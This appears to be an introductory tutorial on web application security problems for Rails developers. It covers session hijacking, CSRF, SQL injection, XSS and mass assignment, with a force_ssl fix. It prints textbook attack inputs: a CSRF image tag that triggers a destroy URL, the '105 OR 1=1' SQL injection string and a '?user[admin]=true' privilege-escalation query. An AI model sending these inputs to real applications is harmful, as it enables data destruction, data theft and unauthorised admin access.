Security Problems In Web Application
Introduction
The growth of the Web Application has benefited to various business sectors as e-commerce, banking, etc as well as to the end-user. However, the sharing of the data over the internet has also attracted the malicious hackers. Generally, the different level of sensitive data of the user is shared to particular application for the transaction over the internet and sometimes the security vulnerability over the application can cause the great harm to the business proprietor as well as to the customers.
Some of the Security problems in web applications :
Session Hijacking
Generally, session is a way of maintaining the user information and keeping track of the particular user throughtout
the interaction with the application. If the application is not secure, then the intruder can intercept between the
user request and the server and see all the credentials. So, it is necessary to encrypt the whole site behind https which
encrypts the data transmission over the internet. For that, you need to purchase SSL certificate and setup the webserver to
support SSL. Then, in config/applicatin.rb make the following configuration
1
config.force_ssl = true
Cross-Site Request Forgery (CSRF)
CSRF is the method of attacking the user running the particular application by sending them links which unwantedly redirect to destructive URL executing the unwanted commands. For e.g
1
<img src = "http://www.webapp.com/project/1/destroy">
If the user’s session in the www.webapp.com is still alive, by clicking on the above link the user unwantedly/unknowingly
has deleted his project number one.
SQL Injection
It is the process of bypassing the authorization of the application and manipulating the database through the malicious query sent through the user input field. For e.g
In input field, user_id : 105 OR 1=1 is equivalent to SELECT * FROM Users WHERE UserId = 105 OR 1=1;.Since, OR 1=1 is always true, this way the hacker
can get all the users from the database.
Cross Site Scripting
It is one of the most destructive security vulnerabilities in web application in which the attacker can insert the JavaScript code that get run in the application’s content. Due to this the attacker get able to acess other pages on the same domain and can read data. The most common entry points are message posts, user comments etc. XSS can steal the cookie, hijack the session, redirect the victim to a fake website, display advertisiments for the benefit fo the attacker or install malicious software through security holes in the web browser.
Mass Assignment
It is a feature of rails which allows an application to create a record from the value of hash. For e.g
1
User.new(params[:user])
Unfortunately, if there is a user field called ‘admin’ which controls administration access, now any user can make themselves an admin with the query like
1
?user[admin]=true